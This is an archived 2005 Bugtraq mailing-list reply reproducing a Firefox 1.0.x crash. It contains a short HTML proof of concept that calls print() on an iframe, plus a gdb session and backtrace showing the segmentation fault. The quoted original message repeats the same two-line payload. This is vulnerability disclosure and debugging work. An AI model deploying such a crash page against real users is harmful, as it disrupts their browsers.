[38816] in bugtraq
Re: Firefox Crash??
daemon@ATHENA.MIT.EDU (Joxean Koret)
Wed May 11 21:14:57 2005
From: Joxean Koret <joxeankoret@yahoo.es>
To: orebla Orebla <info@orebla.it>
Cc: bugtraq@securityfocus.com
In-Reply-To: <20050510203852.24035.qmail@www.securityfocus.com>
Content-Type: multipart/signed; micalg=pgp-sha1; protocol="application/pgp-signature"; boundary="=-Hc2+uVnF8fVmNC47h11N"
Date: Tue, 10 May 2005 23:32:42 +0200
Message-Id: <1115760762.10933.5.camel@nemobox>
Mime-Version: 1.0
--=-Hc2+uVnF8fVmNC47h11N
Content-Type: text/plain
Content-Transfer-Encoding: quoted-printable
Hi,
This works in my Debian Box with 1.0.2:
$ export LD_LIBRARY_PATH=3D/usr/lib/mozilla-firefox/
$ cat test.html
<html>
<body><iframe id=3D"pocframe" name=3D"pocframe" src=3D""></iframe>
<script type=3D"text/javascript">
window.frames.pocframe.print();
</script>
</body>
</html>
$ export LD_LIBRARY_PATH=3D/usr/lib/mozilla-firefox/
$ gdb /usr/lib/mozilla-firefox/firefox-bin
GNU gdb 6.3-debian
Copyright 2004 Free Software Foundation, Inc.
(...)
(gdb) run ~/tmp/test/test.html
Starting program: /usr/lib/mozilla-firefox/firefox-bin
~/tmp/test/test.html
(no debugging symbols found)
(...)
Program received signal SIGSEGV, Segmentation fault.
[Switching to Thread -1220601760 (LWP 17803)]
0x0875d65e in GlobalWindowImpl::MakeScriptDialogTitle ()
(gdb) where
#0 0x0875d65e in GlobalWindowImpl::MakeScriptDialogTitle ()
#1 0xb7f46635 in XPTC_InvokeByIndex ()
from /usr/lib/mozilla-firefox/libxpcom.so
#2 0x083718ae in XPCWrappedNative::CallMethod ()
#3 0x08377f21 in XPC_WN_CallMethod ()
#4 0xb7fa1506 in js_Invoke () from /usr/lib/mozilla-firefox/libmozjs.so
#5 0xb7fab51d in js_Interpret ()
from /usr/lib/mozilla-firefox/libmozjs.so
#6 0xb7fa1bcc in js_Execute ()
from /usr/lib/mozilla-firefox/libmozjs.so
#7 0xb7f7cd14 in JS_EvaluateUCScriptForPrincipals ()
from /usr/lib/mozilla-firefox/libmozjs.so
#8 0x088bd382 in nsJSContext::EvaluateString ()
#9 0x0869341a in nsScriptLoader::EvaluateScript ()
#10 0x08693092 in nsScriptLoader::ProcessRequest ()
#11 0x08692c79 in nsScriptLoader::IsScriptEventHandler ()
#12 0x088896d3 in nsHTMLScriptElement::MaybeProcessScript ()
#13 0x08657d2f in nsGenericElement::AppendChildTo ()
#14 0x086c9765 in HTMLContentSink::ProcessSCRIPTTag ()
#15 0x086c7130 in HTMLContentSink::Init ()
#16 0x0849961e in CNavDTD::AddLeaf ()
#17 0x084977ae in CNavDTD::HandleScriptToken ()
#18 0x08498f59 in CNavDTD::OpenContainer ()
#19 0x08495cbf in CNavDTD::HandleDefaultStartToken ()
#20 0x08496936 in CNavDTD::HandleStartToken ()
#21 0x08494fcb in CNavDTD::BuildNeglectedTarget ()
#22 0x08494674 in CNavDTD::~CNavDTD ()
#23 0x084aae6d in nsParser::ResumeParse ()
#24 0x084aabc0 in nsParser::ResumeParse ()
#25 0x084abe85 in nsParser::DetectMetaTag ()
#26 0x08908acd in nsDocumentOpenInfo::Open ()
#27 0x0840966a in nsFileChannel::EnsureStream ()
#28 0x083c6acb in nsInputStreamPump::OnStateTransfer ()
#29 0x083c692f in nsInputStreamPump::EnsureWaiting ()
#30 0xb7f14c21 in nsInputStreamReadyEvent::EventHandler ()
from /usr/lib/mozilla-firefox/libxpcom.so
#31 0xb7f2b297 in PL_HandleEvent ()
from /usr/lib/mozilla-firefox/libxpcom.so
#32 0xb7f2b1c4 in PL_ProcessPendingEvents ()
from /usr/lib/mozilla-firefox/libxpcom.so
#33 0xb7f2ce59 in nsEventQueueImpl::NotifyObservers ()
from /usr/lib/mozilla-firefox/libxpcom.so
#34 0x08568735 in nsBaseWidget::FreeNativeData ()
#35 0xb7a04dbf in g_vasprintf () from /usr/lib/libglib-2.0.so.0
#36 0xb79df582 in g_main_depth () from /usr/lib/libglib-2.0.so.0
#37 0xb79e05f8 in g_main_context_dispatch ()
from /usr/lib/libglib-2.0.so.0
#38 0xb79e0930 in g_main_context_dispatch ()
from /usr/lib/libglib-2.0.so.0
#39 0xb79e0ed3 in g_main_loop_run () from /usr/lib/libglib-2.0.so.0
#40 0xb7c828f3 in gtk_main () from /usr/lib/libgtk-x11-2.0.so.0
#41 0x08568a78 in nsAppShell::ReleaseGlobals ()
#42 0x08a0e8d4 in nsAppShellService::AttemptingQuit ()
#43 0x08c13800 in xre_main ()
#44 0x0834af24 in main ()
This is a simple bug in Firefox.
Bye,
Joxean Koret
On Tue, 2005-05-10 at 20:38 +0000, orebla Orebla wrote:
>=20
> I have found this script in turn for the net and it sends to me in crash =
Firefox:
>=20
> <!--PROOF OF CONCEPT
> The vulnerability can be exploited with the following 2 lines of code:
>=20
> <iframe id=3D"pocframe" name=3D"pocframe" src=3D"about:blank"></iframe>
> <script type=3D"text/javascript">window.frames.pocframe.print();</s=
cript>
> -->
>=20
> I have WinXP SP2 e Firefox 1.0.3.
>=20
> Why firefox crash???
>=20
> PS: I do not have uncovered the vulnerability. Sorry for the English...=20
> :-)
--=20
------=20
El primer pecado de la humanidad fue la fe; la primera virtud, la duda.
--=-Hc2+uVnF8fVmNC47h11N
Content-Type: application/pgp-signature; name=signature.asc
Content-Description: This is a digitally signed message part
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.0 (GNU/Linux)
iD8DBQBCgSh6U6rFMEYDrlERAgqgAJ9bizV+v+1uNSlVllkFJoApYaKc9wCdEaec
I8PoKmxBAkUlzkzSztBaorw=
=Qr7n
-----END PGP SIGNATURE-----
--=-Hc2+uVnF8fVmNC47h11N--
